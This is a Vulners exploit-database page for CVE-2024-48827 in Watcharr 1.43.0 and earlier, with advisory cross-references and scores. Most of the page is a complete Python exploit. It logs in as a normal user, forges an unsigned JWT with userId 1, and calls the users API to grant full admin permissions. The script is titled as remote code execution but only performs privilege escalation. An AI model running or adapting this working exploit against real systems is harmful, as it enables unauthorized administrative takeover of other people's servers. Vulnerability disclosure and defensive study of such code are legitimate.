Vulners
Lucene search
Watcharr 1.43.0 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2024-48827 | 11 Oct 202418:42 | – | circl |
 | Watcharr 安全漏洞 | 11 Oct 202400:00 | – | cnnvd |
 | CVE-2024-48827 | 11 Oct 202400:00 | – | cve |
 | CVE-2024-48827 | 11 Oct 202400:00 | – | cvelist |
 | CVE-2024-48827 | 11 Oct 202416:15 | – | nvd |
 | CVE-2024-48827 | 11 Oct 202416:15 | – | osv |
 | 📄 Watcharr 1.43.0 Remote Code Execution | 7 Apr 202500:00 | – | packetstorm |
 | PT-2024-33245 · Sbondco · Sbondco Watcharr | 11 Oct 202400:00 | – | ptsecurity |
 | CVE-2024-48827 | 23 May 202510:43 | – | redhatcve |
 | CVE-2024-48827 | 11 Oct 202400:00 | – | vulnrichment |
10
# Exploit Title : Watcharr 1.43.0 - Remote Code Execution (RCE)
# CVE-2024-48827 exploit by Suphawith Phusanbai
# Affected Watcharr version 1.43.0 and below.
import argparse
import requests
import json
import jwt
from pyfiglet import Figlet
f = Figlet(font='slant',width=100)
print(f.renderText('CVE-2024-48827'))
#store JWT token and UserID \ เก็บ token กับ UserID
jwt_token = None
user_id = None
#login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token
def login(host, port, username, password):
url = f'http://{host}:{port}/api/auth/'
#payload in login API request \ payload ใน json
payload = {
'username': username,
'password': password
}
headers = {
'Content-Type': 'application/json'
}
#login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object
try:
response = requests.post(url, data=json.dumps(payload), headers=headers)
if response.status_code == 200:
token = response.json().get('token')
if token:
print(f"[+] SUCCESS! JWT Token: {token}")
global jwt_token
jwt_token = token
#decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object
decoded_payload = jwt.decode(token, options={"verify_signature": False})
global user_id
user_id = decoded_payload.get('userId')
return token
else:
print("[-] Check your password again!")
else:
print(f"[-] Failed :(")
print(f"Response: {response.text}")
except Exception as e:
print(f"Error! HTTP response code: {e}")
#craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน
def create_new_jwt(original_token):
try:
decoded_payload = jwt.decode(original_token, options={"verify_signature": False})
#userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ
decoded_payload['userId'] = 1
new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
print(f"[+] New JWT Token: {new_token}")
return new_token
except Exception as e:
print(f"[-] Failed to create new JWT: {e}")
#privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token
def privilege_escalation(host, port, adminuser, token):
#specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin
url = f'http://{host}:{port}/api/server/users/{user_id}'
# permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3
payload = {
"permissions": 3
}
headers = {
'Authorization': f'{token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(url, data=json.dumps(payload), headers=headers)
if response.status_code == 200:
print(f"[+] Privilege Escalation Successful! The current user is now an admin!")
else:
print(f"[-] Failed to escalate privileges. Response: {response.text}")
except Exception as e:
print(f"Error during privilege escalation: {e}")
#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
#usage
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
args = parser.parse_args()
#step 1: login
token = login(args.host, args.port, args.username, args.password)
#step 2: craft the admin token
if token:
new_token = create_new_jwt(token)
#step 3: Escalate privileges with crafted token. Enjoy!
if new_token:
privilege_escalation(args.host, args.port, args.adminuser, new_token)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.8
EPSS0.11086
SSVC